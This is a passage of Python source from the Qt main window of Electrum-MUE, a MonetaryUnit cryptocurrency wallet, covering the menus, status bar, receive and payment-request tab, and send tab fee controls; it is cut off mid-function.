self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
wallet_menu.addSeparator()
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # "Settings"/"Preferences" are reserved menu names on macOS; use a different label there as a workaround
tools_menu.addAction(_("Electrum-MUE preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.monetaryunit.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('monetaryunit:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-MUE",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying MonetaryUnit.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the MonetaryUnit system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/muecoin/electrum-mue/issues\">https://github.com/muecoin/electrum-mue/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum-MUE (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-MUE - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-MUE", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-MUE", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('MonetaryUnit address where the payment should be received. Note that each payment request uses a different MonetaryUnit address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding MonetaryUnit addresses.'),
_('The MonetaryUnit address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
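        # Build a BIP21-style payment URI from the current address/amount/message,
        # e.g. (illustrative) monetaryunit:<address>?amount=0.1&message=donation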
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a MonetaryUnit address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a MonetaryUnit address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
        completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('MonetaryUnit transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
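        # Slider callback: persist the chosen fee level (dynamic fees) or the
        # absolute fee-per-kB (static fees) in the config, mirror the resulting
        # sat/byte value into the feerate field, then recompute the fee.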
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
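        # The absolute fee and the fee rate edits are mutually exclusive: editing
        # one marks it as user-set and clears the "modified" flag on the other,
        # so do_update_fee() knows which value to honour.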
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
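        # Colour-code the amount/fee/feerate fields: red when there are not
        # enough funds, blue for values that were auto-filled rather than typed
        # by the user, default otherwise.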
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
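        # "Frozen" means the user edited the field manually (see
        # is_send_fee_frozen / is_send_feerate_frozen), so that value is kept
        # rather than recalculated below.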
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
